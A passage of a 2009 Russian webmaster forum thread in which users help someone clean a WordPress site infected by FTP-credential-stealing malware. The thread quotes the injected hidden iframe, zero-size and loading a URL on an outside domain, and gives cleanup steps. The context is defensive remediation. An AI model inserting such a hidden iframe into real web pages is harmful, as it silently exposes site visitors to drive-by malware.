Проблема с WP

123
mr_DEMON
На сайте с 21.06.2007
Offline
71
#11

Дк это не выход... Где искать баг лучше? А ифрейм, если не ошибаюсь, в индексе искаит. да?

mr_DEMON добавил 09.04.2009 в 01:21

RaftKorn:
Думаю проблема здесь:
<IFRAME src="http://tosto-vik.ru/index.php?sall=Bad" width="0" height="0" style="display:none;" ></IFRAME>

Это в index.php искать?

Постоянно продаю пакеты статей различных тематик. Моя работа - ваш успех! (http://www.domenforum.net/showthread.php?t=112012) Здесь (/ru/forum/537612) продаются красивые и качественные сателлиты (/ru/forum/537612).
RaftKorn
На сайте с 20.03.2007
Offline
166
#12

Он может быть в любом файле шаблона, к примеру в функциях и в шаблон инклудится, или вообще в закодированом виде. И смените пароль от хостинга.

Премиум верстка и дизайн под ключ ( https://searchengines.guru/ru/forum/1045270 )
kopusha
На сайте с 04.11.2008
Offline
175
#13

- запускаем Macromedia Dreamweaver.

- найти, вводим строку с ифреймом, область поиска - папка с сайтом, где искать - код.

- удаляем.

- перезаливаем файлы.

- сносим в коммандере сохраненный пароль на хостинг.

- придумываем новый пароль, но не просто придумываем (так работать не будет), а прописываем его в настройках хостинга.

- чистим комп от трояна (перекинуть винду не повредит)

- не храним более пароли нигде, кроме головы и записки на холодильнике.

- дочитали до сюда? говорим спасибо в ветке и отправляемся делать предыдущие пункты.

Pike
На сайте с 13.07.2004
Offline
79
#14

У Вас паразит. Откройте index.php на сервере и уберите <iframe src=..... width="0" height="0" style="display:none;"></iframe> в конце. Эта дрянь попадает с зараженых виндосов через ftp, проверяйте свои десктопы

free hosting (http://rahost.com)
RaftKorn
На сайте с 20.03.2007
Offline
166
#15
Откройте index.php

В вордпресе он может и не в этом файле лежать. Скорее всего в footer.php.

mr_DEMON
На сайте с 21.06.2007
Offline
71
#16

iframe src удалил. У меня антивир не кричит. Но проблема с IE осталась. :(

Pike
На сайте с 13.07.2004
Offline
79
#17
RaftKorn:
В вордпресе он может и не в этом файле лежать. Скорее всего в footer.php.

Эта штука не разбирает вордпрессов и т.п. Она тупо пишет в index htm,html,php,asp и так далее в первую очередь. Потом начинает искать фалы с названиями типа default, page...

Pike добавил 09.04.2009 в 13:18

mr_DEMON:
iframe src удалил. У меня антивир не кричит. Но проблема с IE осталась. :(

Я сейчас в 6 открыл. Починили?

www_master
На сайте с 09.04.2009
Offline
73
#18

Был у меня подобный вирус на одном из сайтов.

Решил проблему стандартно:

1 Выполнил поиск зловредных участков кода по всему сайту и вырезал их.

2 Сменил реквизиты доступа к FTP

Больше зараза не появлялась.

mr_DEMON
На сайте с 21.06.2007
Offline
71
#19
Pike:

Я сейчас в 6 открыл. Починили?

Да нет, у меня в 7-м не открывается.

mr_DEMON добавил 09.04.2009 в 17:54

www_master:
Был у меня подобный вирус на одном из сайтов.

Решил проблему стандартно:
1 Выполнил поиск зловредных участков кода по всему сайту и вырезал их.
2 Сменил реквизиты доступа к FTP

Больше зараза не появлялась.

А как такой поиск можно сделать? стоит просто этот ифреймовский код поискать в каждом файле движка?

[Удален]
#20
mr_DEMON:
А как такой поиск можно сделать? стоит просто этот ифреймовский код поискать в каждом файле движка?

1. Поискать недавно изменённые файлы. В них и искать вхождение кода (если он не закодирован)..

2. Скопировать найденные в п1 (или все) пхп-файлы к себе на комп.

Любой софтиной, умееющей искать по множеству файлов найти этот код

3. Если есть исходный локальный дистрибутив ВП - сделать синхронизацию с сервером.

Со всеми задачами прекрасно справляется ТоталКомандир.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий